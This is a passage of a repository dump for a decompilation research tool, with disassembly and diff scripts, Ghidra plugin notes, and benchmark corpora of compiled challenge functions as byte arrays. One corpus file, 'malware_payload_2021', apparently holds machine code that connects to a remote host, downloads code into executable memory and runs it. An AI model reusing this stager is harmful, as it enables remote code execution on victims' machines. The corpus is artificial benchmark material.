symbol.name + '@plt.sec' 119 | prev = instruction.address + instruction.size 120 | 121 | def scan_sections(self): 122 | """Index all available sections and their addresses""" 123 | 
for section in self.elf.iter_sections(): 124 | section.addr = section['sh_addr'] 125 | section.range = range(section.addr, section.addr + section.data_size) 126 | self.sections.add(section, section.name, section.addr) 127 | 128 | def scan_symbols(self): 129 | """Find and index all the symbols that we can""" 130 | self.scan_symtab() 131 | self.scan_relocations() 132 | 133 | self.scan_plt() 134 | self.scan_plt_sec() 135 | 136 | def scan_symtab(self): 137 | """Read symbols stored in the .symtab section""" 138 | for symbol in self.sections['.symtab'].iter_symbols(): 139 | if symbol.name: 140 | symbol.addr = symbol.__dict__['entry']['st_value'] 141 | self.symbols.add(symbol, symbol.name, symbol.addr) 142 | 143 | def scan_relocations(self): 144 | """Read symbols from any relocation sections""" 145 | for section in self.sections: 146 | if isinstance(section, RelocationSection): 147 | symtab = self.elf.get_section(section['sh_link']) 148 | for relocation in section.iter_relocations(): 149 | symbol = symtab.get_symbol(relocation['r_info_sym']) 150 | if symbol.name: 151 | symbol.addr = relocation['r_offset'] 152 | self.symbols.add(symbol, symbol.name, symbol.addr) 153 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/bindings.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import io 3 | import yaml 4 | from decompetition_disassembler.binary import Binary 5 | from diff_match_patch import diff_match_patch 6 | dmp = diff_match_patch() 7 | 8 | def diff_all(disasm, target): 9 | """Diff two disassembly maps""" 10 | names = set() 11 | names.update(disasm.keys()) 12 | names.update(target.keys()) 13 | 14 | result = {} 15 | deltas = [0, 0, 0, 0] 16 | 17 | for name in names: 18 | if name not in disasm: 19 | t = target[name]['asm'] 20 | n = nlines(t) 21 | hunks = [[1, t, n]] 22 | delta = [0, 0, n, n] 23 | srcmap = [] 24 | elif name not in target: 25 | d = 
disasm[name]['asm'] 26 | n = nlines(d) 27 | hunks = [[-1, d, n]] 28 | delta = [n, 0, 0, n] 29 | srcmap = disasm[name].get('map', []) 30 | else: 31 | t = target[name]['asm'] 32 | d = disasm[name]['asm'] 33 | hunks, delta = diff_one(d, t) 34 | srcmap = disasm[name].get('map', []) 35 | 36 | for i in range(4): 37 | deltas[i] += delta[i] 38 | 39 | result[name] = { 40 | 'hunks': hunks, 41 | 'delta': delta, 42 | 'srcmap': srcmap 43 | } 44 | 45 | return result, deltas 46 | 47 | def diff_one(disasm, target): 48 | """Diff two text blocks of disassembly""" 49 | d, t, map = dmp.diff_linesToChars(disasm, target) 50 | diffs = dmp.diff_main(d, t, False) 51 | dmp.diff_charsToLines(diffs, map) 52 | 53 | delta = [0, 0, 0, 0] 54 | hunks = [] 55 | for diff in diffs: 56 | n = diff[1].count('\n') 57 | hunks.append([diff[0], diff[1], n]) 58 | 59 | delta[diff[0] + 1] += n 60 | delta[3] += n 61 | 62 | return hunks, delta 63 | 64 | def nlines(text): 65 | """Count the number of lines in a text block""" 66 | n = text.count('\n') 67 | if not text.endswith('\n'): 68 | n += 1 69 | return n 70 | 71 | 72 | def print_yaml(disasm, stream=sys.stdout): 73 | from yaml import Dumper 74 | dumper = Dumper(stream) 75 | 76 | # Force a Git-friendly output format: 77 | # https://stackoverflow.com/a/8641732 78 | def strdump(dumper, data): 79 | return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') 80 | dumper.add_representer(str, strdump) 81 | 82 | dumper.open() 83 | dumper.represent(disasm) 84 | dumper.close() 85 | 86 | def get_disasm(binary_path, language, func_name): 87 | binary = Binary(binary_path, language) 88 | disasm = binary.disassemble([func_name], None) 89 | 90 | return disasm -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/differ.py: -------------------------------------------------------------------------------- 1 | #! 
/usr/bin/env python3 2 | 3 | from diff_match_patch import diff_match_patch 4 | dmp = diff_match_patch() 5 | 6 | def diff_all(disasm, target): 7 | """Diff two disassembly maps""" 8 | names = set() 9 | names.update(disasm.keys()) 10 | names.update(target.keys()) 11 | 12 | result = {} 13 | deltas = [0, 0, 0, 0] 14 | 15 | for name in names: 16 | if name not in disasm: 17 | t = target[name]['asm'] 18 | n = nlines(t) 19 | hunks = [[1, t, n]] 20 | delta = [0, 0, n, n] 21 | srcmap = [] 22 | elif name not in target: 23 | d = disasm[name]['asm'] 24 | n = nlines(d) 25 | hunks = [[-1, d, n]] 26 | delta = [n, 0, 0, n] 27 | srcmap = disasm[name].get('map', []) 28 | else: 29 | t = target[name]['asm'] 30 | d = disasm[name]['asm'] 31 | hunks, delta = diff_one(d, t) 32 | srcmap = disasm[name].get('map', []) 33 | 34 | for i in range(4): 35 | deltas[i] += delta[i] 36 | 37 | result[name] = { 38 | 'hunks': hunks, 39 | 'delta': delta, 40 | 'srcmap': srcmap 41 | } 42 | 43 | return result, deltas 44 | 45 | def diff_one(disasm, target): 46 | """Diff two text blocks of disassembly""" 47 | d, t, map = dmp.diff_linesToChars(disasm, target) 48 | diffs = dmp.diff_main(d, t, False) 49 | dmp.diff_charsToLines(diffs, map) 50 | 51 | delta = [0, 0, 0, 0] 52 | hunks = [] 53 | for diff in diffs: 54 | n = diff[1].count('\n') 55 | hunks.append([diff[0], diff[1], n]) 56 | 57 | delta[diff[0] + 1] += n 58 | delta[3] += n 59 | 60 | return hunks, delta 61 | 62 | def nlines(text): 63 | """Count the number of lines in a text block""" 64 | n = text.count('\n') 65 | if not text.endswith('\n'): 66 | n += 1 67 | return n 68 | 69 | 70 | if __name__ == '__main__': 71 | import argparse 72 | import yaml 73 | import sys 74 | 75 | def read_yaml(path): 76 | with open(path) as file: 77 | return yaml.safe_load(file) 78 | 79 | parser = argparse.ArgumentParser() 80 | parser.add_argument('disasm', help='path to the YAML disassembly of a candidate binary') 81 | parser.add_argument('target', help='path to the YAML disassembly of 
the target binary') 82 | 83 | args = parser.parse_args() 84 | disasm = read_yaml(args.disasm) 85 | target = read_yaml(args.target) 86 | 87 | # Force a Git-friendly output format: 88 | # https://stackoverflow.com/a/8641732 89 | def strdump(dumper, data): 90 | return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') 91 | yaml.add_representer(str, strdump) 92 | 93 | functions, _ = diff_all(disasm, target) 94 | sys.stdout.write(yaml.dump(functions)) 95 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/disassembler.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | 3 | import fnmatch 4 | import re 5 | import sys 6 | 7 | from binary import Binary 8 | 9 | def print_text(disasm, stream=sys.stdout): 10 | for name, info in disasm.items(): 11 | stream.write(info['asm']) 12 | stream.write('\n') 13 | 14 | def print_yaml(disasm, stream=sys.stdout): 15 | from yaml import Dumper 16 | dumper = Dumper(stream) 17 | 18 | # Force a Git-friendly output format: 19 | # https://stackoverflow.com/a/8641732 20 | def strdump(dumper, data): 21 | return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') 22 | dumper.add_representer(str, strdump) 23 | 24 | dumper.open() 25 | dumper.represent(disasm) 26 | dumper.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | import argparse 31 | 32 | parser = argparse.ArgumentParser() 33 | parser.add_argument('-l', '--language', help='the original source language', required=True) 34 | parser.add_argument('-s', '--srcmap', help='include line numbers from the debug info', action='store_true') 35 | parser.add_argument('-y', '--yaml', help='produce YAML output instead of plaintext', action='store_true') 36 | parser.add_argument('binary', help='path to an ELF binary to disassemble') 37 | parser.add_argument('patterns', help='function names (glob patterns)', nargs='+') 38 | 39 | args = 
parser.parse_args() 40 | binary = Binary(args.binary, args.language) 41 | disasm = binary.disassemble(args.patterns, args.srcmap) 42 | 43 | if args.yaml: 44 | print_yaml(disasm) 45 | else: 46 | print_text(disasm) 47 | -------------------------------------------------------------------------------- /compiler/decompetition_disassembler/requirements.txt: -------------------------------------------------------------------------------- 1 | capstone 2 | diff_match_patch 3 | intervaltree 4 | pyelftools 5 | pyyaml 6 | -------------------------------------------------------------------------------- /compiler/pseudoexport.py: -------------------------------------------------------------------------------- 1 | # This ghidra headless script allows you to export the ghidra pseudocode of a function 2 | from ghidra.program.model.symbol import SymbolType 3 | from ghidra.app.decompiler import DecompInterface 4 | import os 5 | 6 | name = os.environ['FUNC_NAME'] 7 | filename = name.replace(":","_") 8 | 9 | output_path = os.environ['PSEUDOCODE_OUTPUT_PATH'] 10 | program_name = currentProgram.getName() 11 | full_path = os.path.join(output_path, program_name + "_" + filename + ".txt") 12 | 13 | symbolTable = currentProgram.getSymbolTable() 14 | 15 | symbols = symbolTable.getSymbolIterator() 16 | 17 | for symbol in symbols: 18 | if symbol.getSymbolType() == SymbolType.FUNCTION: 19 | print(symbol.getName(True)) 20 | if symbol.getName(True) == name: 21 | print("Found function!") 22 | function = getFunctionAt(symbol.getAddress()) 23 | decompInterface = DecompInterface() 24 | decompInterface.openProgram(currentProgram) 25 | results = decompInterface.decompileFunction(function, 0, None) 26 | functionCode = results.getDecompiledFunction().getC() 27 | f = open(full_path, "w") 28 | f.write(functionCode) 29 | f.close() 30 | -------------------------------------------------------------------------------- /docs/GhidraGUI.md: 
-------------------------------------------------------------------------------- 1 | # Ghidra GUI Notes 2 | This file explains how to create GUI components in Ghidra from a plugin. When this plugin was written, I could not find any documentation on the topic online, so these notes are provided to help other plugin developers. 3 | Note: the code examples are written in Jython, but the classes and methods referenced should work for Java plugins as well. 4 | 5 | ## [PluginTool](https://ghidra.re/ghidra_docs/api/ghidra/framework/plugintool/PluginTool.html) 6 | The PluginTool class lets a developer manage and interact with plugins within the Ghidra environment. From a script, an instance of this class can be obtained by calling: 7 | ```python 8 | currentTool = state.getTool() 9 | ``` 10 | Using this instance, we can add ComponentProviders, which are objects that "provide" a visual component or representation for a plugin. The following code adds a ComponentProvider: 11 | ```python 12 | currentTool = state.getTool() 13 | #The second parameter controls whether the ComponentProvider is shown. 14 | currentTool.addComponentProvider(currentProvider, True) 15 | ``` 16 | ## [ComponentProviderAdapter](https://ghidra.re/ghidra_docs/api/ghidra/framework/plugintool/ComponentProviderAdapter.html) 17 | The ComponentProviderAdapter class extends the ComponentProvider class so that a GUI component can be added to the tool. You create a subclass of it to implement the functionality and the GUI for your plugin. Ghidra builds its GUI with the javax.swing library, so the subclass constructor should create the Swing components you need. You also need to override the getComponent() method to return the GUI component that you want to display.
Here is a simple example: 18 | ```python 19 | class SimpleComponentProviderAdapter(ComponentProviderAdapter): 20 | def __init__(self, tool, name): 21 | #Call the superclass constructor with the current PluginTool, the provider name, and the owner (the name is reused as the owner here) 22 | ComponentProviderAdapter.__init__(self, tool, name, name) 23 | #Create an editable javax.swing text area 24 | self.textArea = JTextArea(10, 80) 25 | self.textArea.setEditable(True) 26 | self.textArea.setLineWrap(True) 27 | #Set the position of the component to the right 28 | self.setDefaultWindowPosition(WindowPosition.RIGHT) 29 | #Set title of component 30 | self.setTitle("OpenAI Pseudocode") 31 | #Set component to be visible 32 | self.setVisible(True) 33 | 34 | def getComponent(self): 35 | return self.textArea 36 | ``` 37 | ## [DockingAction](https://ghidra.re/ghidra_docs/api/docking/action/DockingAction.html) 38 | The DockingAction class represents the action associated with a particular menu or toolbar item. You can subclass DockingAction to define your own custom action or menu item, and an instance of that subclass can then be added to a ComponentProviderAdapter object. The subclass must override the actionPerformed method, which defines the code that runs when the item is triggered. You can also associate an icon and a key binding with a DockingAction object.
Here is a simple example: 39 | ```python 40 | class SimpleDockingAction(DockingAction): 41 | def __init__(self, owner): 42 | #Pass the action name, the owner, and the key-binding flag to the superclass constructor 43 | DockingAction.__init__(self, "Tooltip for action", owner, False) 44 | self.markHelpUnnecessary() 45 | #Enable the DockingAction 46 | self.setEnabled(True) 47 | #Load and set an icon for the DockingAction 48 | icon = ResourceManager.loadImage("images/edit-cut.png") 49 | self.setToolBarData(ToolBarData(icon)) 50 | 51 | #Override the actionPerformed method 52 | def actionPerformed(self, actionContext): 53 | print("Overridden!") 54 | ``` 55 | ## Conclusion 56 | With this information, you should now be able to create GUI components for your plugin. For more complex GUI components and styles, modify the Java Swing code inside your ComponentProviderAdapter subclass. 57 | -------------------------------------------------------------------------------- /eval/README.md: -------------------------------------------------------------------------------- 1 | # Decompilation Evaluation/Scoring Tool 2 | This folder contains the code for the decompilation scoring tool, which measures how accurate a given decompilation output is compared to the original source. 3 | The decompilation is scored by parsing it and counting the number of function calls and branches. 4 | ## eval.py 5 | This file contains the main code for the tool. The tool can be used as follows: 6 | ```bash 7 | python3 eval.py -d PATH_TO_DISASSEMBLY_FILES -s PATH_TO_SOURCE_FILES -l LANGUAGE 8 | ``` 9 | Here is the full help description of the tool: 10 | ```bash 11 | usage: Pseudocode Evaluator [-h] -d DISASM -s SOURCE -l LANGUAGE 12 | 13 | This program evaluates the accuracy of decompiled code compared to its disassembly. 14 | 15 | options: 16 | -h, --help show this help message and exit 17 | -d DISASM, --disasm DISASM 18 | Specify the directory to disassembly files.
19 | -s SOURCE, --source SOURCE 20 | Specify the directory to decompilation source files. 21 | -l LANGUAGE, --language LANGUAGE 22 | Specify the language (C, CPP, Rust, Go) of decompilation files. 23 | ``` 24 | The scoring functions in eval.py are also used by the benchmark tool as its scoring method. 25 | ## extract_type.py 26 | This script takes a tree-sitter node-types JSON file (e.g. [cpp_types.json](https://github.com/tree-sitter/tree-sitter-cpp/blob/master/src/node-types.json)) that describes the AST node types and determines the unique types that appear in it. 27 | ## *_corpus folders 28 | The c_corpus, cpp_corpus, rust_corpus, and go_corpus subfolders each contain subfolders named prompts, disasm, and source, which hold the prompts, disassembly, and source of binaries from the Decompetition challenges. 29 | The data in these folders can also be used with the benchmarking and compiler-augmented generation tools. 30 | Here are links to the code from the challenges: 31 | [Challenges 2020](https://github.com/decompetition/challenges-2020) 32 | [Challenges 2021](https://github.com/decompetition/challenges-2021) 33 | -------------------------------------------------------------------------------- /eval/c_corpus/disasm/baby_c_main_2021.txt: -------------------------------------------------------------------------------- 1 | [243, 15, 30, 250, 85, 72, 137, 229, 83, 72, 131, 236, 24, 198, 69, 235, 1, 72, 139, 5, 63, 46, 0, 0, 72, 137, 199, 232, 215, 254, 255, 255, 137, 69, 236, 131, 125, 236, 255, 15, 132, 132, 0, 0, 0, 232, 213, 254, 255, 255, 72, 139, 0, 139, 85, 236, 72, 99, 210, 72, 1, 210, 72, 1, 208, 15, 183, 0, 15, 183, 192, 37, 0, 32, 0, 0, 133, 192, 116, 26, 72, 139, 21, 240, 45, 0, 0, 139, 69, 236, 72, 137, 214, 137, 199, 232, 115, 254, 255, 255, 198, 69, 235, 1, 235, 167, 128, 125, 235, 0, 116, 33, 72, 139, 29, 208, 45, 0, 0, 139, 69, 236, 137, 199, 232, 70, 254, 255, 255, 72, 137, 222, 137, 199, 232, 76, 254, 255, 255, 198, 69, 235, 0, 235,
128, 72, 139, 29, 175, 45, 0, 0, 139, 69, 236, 137, 199, 232, 69, 254, 255, 255, 72, 137, 222, 137, 199, 232, 43, 254, 255, 255, 233, 96, 255, 255, 255, 144, 184, 0, 0, 0, 0, 72, 131, 196, 24, 91, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/demesne_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 96, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 131, 125, 248, 2, 15, 141, 29, 0, 0, 0, 72, 191, 4, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 79, 254, 255, 255, 199, 69, 252, 255, 255, 255, 255, 233, 239, 0, 0, 0, 72, 139, 69, 240, 72, 139, 120, 8, 49, 192, 137, 198, 49, 210, 232, 80, 254, 255, 255, 137, 69, 236, 72, 141, 125, 192, 49, 246, 186, 32, 0, 0, 0, 232, 45, 254, 255, 255, 199, 69, 188, 0, 0, 0, 0, 131, 125, 188, 16, 15, 141, 177, 0, 0, 0, 72, 141, 125, 192, 49, 246, 186, 32, 0, 0, 0, 232, 12, 254, 255, 255, 139, 69, 236, 51, 69, 188, 137, 69, 184, 72, 141, 125, 184, 232, 26, 255, 255, 255, 137, 69, 180, 139, 69, 180, 185, 5, 0, 0, 0, 153, 247, 249, 131, 194, 5, 137, 85, 176, 199, 69, 172, 0, 0, 0, 0, 139, 69, 172, 59, 69, 176, 15, 141, 50, 0, 0, 0, 72, 141, 125, 184, 232, 234, 254, 255, 255, 137, 69, 168, 139, 69, 168, 185, 26, 0, 0, 0, 153, 247, 249, 131, 194, 97, 136, 209, 72, 99, 69, 172, 136, 76, 5, 192, 139, 69, 172, 131, 192, 1, 137, 69, 172, 233, 194, 255, 255, 255, 72, 141, 125, 192, 72, 190, 28, 32, 64, 0, 0, 0, 0, 0, 232, 174, 253, 255, 255, 72, 141, 117, 192, 72, 191, 33, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 105, 253, 255, 255, 139, 69, 188, 131, 192, 1, 137, 69, 188, 233, 69, 255, 255, 255, 199, 69, 252, 0, 0, 0, 0, 139, 69, 252, 72, 131, 196, 96, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/dublin_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 
236, 64, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 72, 199, 69, 232, 0, 0, 0, 0, 72, 199, 69, 224, 0, 0, 0, 0, 72, 199, 69, 216, 0, 0, 0, 0, 72, 199, 69, 208, 0, 0, 0, 0, 72, 199, 69, 200, 0, 0, 0, 0, 199, 69, 196, 0, 0, 0, 0, 72, 191, 32, 32, 64, 0, 0, 0, 0, 0, 72, 141, 117, 196, 176, 0, 232, 22, 253, 255, 255, 131, 248, 1, 15, 132, 5, 0, 0, 0, 233, 77, 1, 0, 0, 233, 0, 0, 0, 0, 49, 192, 72, 131, 125, 208, 0, 136, 69, 195, 15, 132, 16, 0, 0, 0, 72, 139, 69, 208, 139, 64, 8, 59, 69, 196, 15, 159, 192, 136, 69, 195, 138, 69, 195, 168, 1, 15, 133, 5, 0, 0, 0, 233, 50, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 200, 72, 139, 69, 216, 72, 137, 69, 208, 72, 131, 125, 216, 0, 15, 132, 18, 0, 0, 0, 72, 139, 69, 216, 72, 139, 0, 72, 139, 77, 200, 72, 49, 200, 72, 137, 69, 216, 233, 158, 255, 255, 255, 233, 0, 0, 0, 0, 49, 192, 72, 131, 125, 208, 0, 136, 69, 194, 15, 132, 16, 0, 0, 0, 72, 139, 69, 208, 139, 64, 8, 59, 69, 196, 15, 156, 192, 136, 69, 194, 138, 69, 194, 168, 1, 15, 133, 5, 0, 0, 0, 233, 50, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 216, 72, 139, 69, 200, 72, 137, 69, 208, 72, 131, 125, 200, 0, 15, 132, 18, 0, 0, 0, 72, 139, 69, 200, 72, 139, 0, 72, 139, 77, 216, 72, 49, 200, 72, 137, 69, 200, 233, 158, 255, 255, 255, 72, 131, 125, 208, 0, 15, 132, 53, 0, 0, 0, 72, 139, 69, 208, 139, 64, 8, 59, 69, 196, 15, 143, 8, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 216, 72, 139, 69, 208, 139, 64, 8, 59, 69, 196, 15, 142, 8, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 200, 233, 0, 0, 0, 0, 139, 125, 196, 72, 139, 117, 216, 72, 139, 85, 200, 232, 234, 252, 255, 255, 72, 137, 69, 208, 72, 131, 125, 216, 0, 15, 133, 8, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 232, 72, 131, 125, 200, 0, 15, 133, 8, 0, 0, 0, 72, 139, 69, 208, 72, 137, 69, 224, 233, 137, 254, 255, 255, 72, 131, 125, 232, 0, 15, 132, 83, 0, 0, 0, 72, 131, 125, 224, 0, 15, 132, 72, 0, 0, 0, 72, 191, 35, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 116, 251, 255, 255, 72, 139, 125, 232, 72, 190, 45, 32, 64, 0, 0, 
0, 0, 0, 232, 17, 253, 255, 255, 72, 191, 54, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 80, 251, 255, 255, 72, 139, 125, 224, 72, 190, 64, 32, 64, 0, 0, 0, 0, 0, 232, 237, 252, 255, 255, 49, 192, 72, 131, 196, 64, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/leipzig_main_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 32, 199, 69, 252, 0, 0, 0, 0, 137, 125, 248, 72, 137, 117, 240, 131, 125, 248, 2, 15, 132, 35, 0, 0, 0, 72, 139, 60, 37, 160, 64, 64, 0, 72, 190, 8, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 39, 253, 255, 255, 191, 6, 0, 0, 0, 232, 205, 252, 255, 255, 72, 199, 4, 37, 184, 64, 64, 0, 0, 0, 0, 0, 72, 139, 69, 240, 72, 139, 120, 8, 232, 52, 253, 255, 255, 72, 152, 72, 137, 4, 37, 176, 64, 64, 0, 72, 131, 60, 37, 176, 64, 64, 0, 1, 15, 141, 35, 0, 0, 0, 72, 139, 60, 37, 160, 64, 64, 0, 72, 190, 15, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 210, 252, 255, 255, 191, 6, 0, 0, 0, 232, 120, 252, 255, 255, 191, 10, 0, 0, 0, 72, 190, 208, 18, 64, 0, 0, 0, 0, 0, 232, 164, 252, 255, 255, 191, 12, 0, 0, 0, 72, 190, 112, 18, 64, 0, 0, 0, 0, 0, 232, 144, 252, 255, 255, 191, 21, 0, 0, 0, 72, 190, 192, 17, 64, 0, 0, 0, 0, 0, 232, 124, 252, 255, 255, 191, 22, 0, 0, 0, 72, 190, 32, 18, 64, 0, 0, 0, 0, 0, 232, 104, 252, 255, 255, 232, 51, 252, 255, 255, 137, 69, 236, 72, 191, 192, 64, 64, 0, 0, 0, 0, 0, 190, 1, 0, 0, 0, 232, 156, 252, 255, 255, 137, 69, 232, 131, 125, 232, 0, 15, 133, 7, 0, 0, 0, 199, 69, 232, 21, 0, 0, 0, 139, 125, 236, 139, 117, 232, 232, 77, 252, 255, 255, 139, 69, 252, 72, 131, 196, 32, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/malware_payload_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 32, 191, 2, 0, 0, 0, 190, 1, 0, 0, 0, 49, 210, 232, 71, 254, 255, 255, 137, 69, 252, 72, 
191, 4, 32, 64, 0, 0, 0, 0, 0, 232, 181, 253, 255, 255, 137, 69, 236, 102, 199, 69, 232, 2, 0, 191, 184, 34, 0, 0, 232, 98, 253, 255, 255, 102, 137, 69, 234, 139, 125, 252, 72, 141, 117, 232, 186, 16, 0, 0, 0, 232, 253, 253, 255, 255, 131, 248, 0, 15, 141, 25, 0, 0, 0, 72, 191, 14, 32, 64, 0, 0, 0, 0, 0, 232, 245, 254, 255, 255, 191, 4, 0, 0, 0, 232, 203, 253, 255, 255, 49, 192, 65, 137, 193, 190, 0, 16, 0, 0, 186, 7, 0, 0, 0, 185, 34, 0, 0, 0, 65, 184, 255, 255, 255, 255, 76, 137, 207, 232, 249, 252, 255, 255, 72, 137, 69, 224, 139, 125, 252, 72, 139, 117, 224, 186, 0, 4, 0, 0, 232, 36, 253, 255, 255, 72, 131, 248, 0, 15, 141, 25, 0, 0, 0, 72, 191, 33, 32, 64, 0, 0, 0, 0, 0, 232, 155, 254, 255, 255, 191, 5, 0, 0, 0, 232, 113, 253, 255, 255, 72, 191, 45, 32, 64, 0, 0, 0, 0, 0, 232, 130, 254, 255, 255, 176, 0, 255, 85, 224, 49, 192, 72, 131, 196, 32, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/rotterdam_reed_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 129, 236, 176, 0, 0, 0, 137, 125, 252, 72, 137, 117, 240, 72, 141, 189, 112, 255, 255, 255, 72, 190, 80, 32, 64, 0, 0, 0, 0, 0, 186, 128, 0, 0, 0, 232, 147, 253, 255, 255, 199, 133, 104, 255, 255, 255, 0, 0, 0, 0, 199, 133, 100, 255, 255, 255, 0, 0, 0, 0, 139, 125, 252, 72, 139, 117, 240, 72, 141, 141, 112, 255, 255, 255, 72, 186, 24, 32, 64, 0, 0, 0, 0, 0, 76, 141, 133, 108, 255, 255, 255, 232, 43, 253, 255, 255, 137, 133, 96, 255, 255, 255, 131, 189, 96, 255, 255, 255, 0, 15, 141, 5, 0, 0, 0, 233, 219, 0, 0, 0, 139, 133, 96, 255, 255, 255, 137, 133, 92, 255, 255, 255, 131, 232, 63, 15, 132, 178, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 92, 255, 255, 255, 131, 232, 100, 15, 132, 60, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 92, 255, 255, 255, 131, 232, 101, 15, 132, 25, 0, 0, 0, 233, 0, 0, 0, 0, 139, 133, 92, 255, 255, 255, 131, 232, 107, 15, 132, 35, 0, 0, 0, 233, 118, 0, 0, 0, 199, 133, 
104, 255, 255, 255, 0, 0, 0, 0, 233, 113, 0, 0, 0, 199, 133, 104, 255, 255, 255, 1, 0, 0, 0, 233, 98, 0, 0, 0, 72, 139, 60, 37, 104, 64, 64, 0, 232, 146, 254, 255, 255, 137, 133, 100, 255, 255, 255, 131, 189, 100, 255, 255, 255, 1, 15, 140, 13, 0, 0, 0, 131, 189, 100, 255, 255, 255, 25, 15, 142, 28, 0, 0, 0, 72, 139, 52, 37, 104, 64, 64, 0, 72, 191, 29, 32, 64, 0, 0, 0, 0, 0, 232, 219, 253, 255, 255, 233, 5, 0, 0, 0, 233, 20, 0, 0, 0, 233, 0, 0, 0, 0, 233, 0, 0, 0, 0, 191, 1, 0, 0, 0, 232, 29, 252, 255, 255, 233, 233, 254, 255, 255, 131, 189, 100, 255, 255, 255, 0, 15, 133, 35, 0, 0, 0, 191, 2, 0, 0, 0, 72, 190, 43, 32, 64, 0, 0, 0, 0, 0, 186, 14, 0, 0, 0, 232, 2, 252, 255, 255, 191, 1, 0, 0, 0, 232, 232, 251, 255, 255, 131, 189, 104, 255, 255, 255, 0, 15, 132, 17, 0, 0, 0, 184, 26, 0, 0, 0, 43, 133, 100, 255, 255, 255, 137, 133, 100, 255, 255, 255, 139, 133, 100, 255, 255, 255, 72, 129, 196, 176, 0, 0, 0, 93, 195] -------------------------------------------------------------------------------- /eval/c_corpus/disasm/winkey_check_2021.txt: -------------------------------------------------------------------------------- 1 | [85, 72, 137, 229, 72, 131, 236, 80, 72, 137, 125, 240, 72, 141, 125, 234, 49, 246, 186, 6, 0, 0, 0, 232, 164, 254, 255, 255, 72, 141, 125, 230, 49, 246, 186, 4, 0, 0, 0, 232, 148, 254, 255, 255, 72, 141, 125, 222, 49, 246, 186, 8, 0, 0, 0, 232, 132, 254, 255, 255, 72, 141, 125, 216, 49, 246, 186, 6, 0, 0, 0, 232, 116, 254, 255, 255, 72, 139, 125, 240, 72, 141, 85, 234, 72, 141, 77, 230, 76, 141, 69, 222, 76, 141, 77, 216, 72, 190, 4, 32, 64, 0, 0, 0, 0, 0, 176, 0, 232, 111, 254, 255, 255, 72, 141, 125, 234, 232, 38, 254, 255, 255, 72, 131, 248, 5, 15, 133, 57, 0, 0, 0, 72, 141, 125, 230, 232, 19, 254, 255, 255, 72, 131, 248, 3, 15, 133, 38, 0, 0, 0, 72, 141, 125, 222, 232, 0, 254, 255, 255, 72, 131, 248, 7, 15, 133, 19, 0, 0, 0, 72, 141, 125, 216, 232, 237, 253, 255, 255, 72, 131, 248, 5, 15, 132, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 
233, 87, 1, 0, 0, 72, 141, 125, 234, 72, 190, 20, 32, 64, 0, 0, 0, 0, 0, 72, 141, 85, 212, 72, 141, 77, 208, 176, 0, 232, 250, 253, 255, 255, 131, 125, 212, 1, 15, 140, 13, 0, 0, 0, 129, 125, 212, 110, 1, 0, 0, 15, 142, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 23, 1, 0, 0, 131, 125, 208, 3, 15, 142, 22, 0, 0, 0, 131, 125, 208, 95, 15, 141, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 247, 0, 0, 0, 72, 141, 125, 230, 190, 27, 32, 64, 0, 232, 153, 253, 255, 255, 131, 248, 0, 15, 132, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 212, 0, 0, 0, 15, 190, 125, 222, 232, 139, 254, 255, 255, 131, 248, 0, 15, 133, 36, 0, 0, 0, 15, 190, 125, 229, 232, 121, 254, 255, 255, 131, 248, 0, 15, 132, 18, 0, 0, 0, 15, 190, 125, 229, 232, 103, 254, 255, 255, 131, 248, 8, 15, 142, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 146, 0, 0, 0, 15, 190, 125, 223, 232, 73, 254, 255, 255, 137, 69, 184, 15, 190, 125, 224, 232, 61, 254, 255, 255, 137, 193, 139, 69, 184, 1, 200, 137, 69, 188, 15, 190, 125, 225, 232, 42, 254, 255, 255, 137, 193, 139, 69, 188, 1, 200, 137, 69, 192, 15, 190, 125, 226, 232, 23, 254, 255, 255, 137, 193, 139, 69, 192, 1, 200, 137, 69, 196, 15, 190, 125, 227, 232, 4, 254, 255, 255, 137, 193, 139, 69, 196, 1, 200, 137, 69, 200, 15, 190, 125, 228, 232, 241, 253, 255, 255, 137, 193, 139, 69, 200, 1, 200, 137, 69, 204, 139, 69, 204, 185, 7, 0, 0, 0, 153, 247, 249, 131, 250, 0, 15, 132, 12, 0, 0, 0, 199, 69, 252, 255, 255, 255, 255, 233, 7, 0, 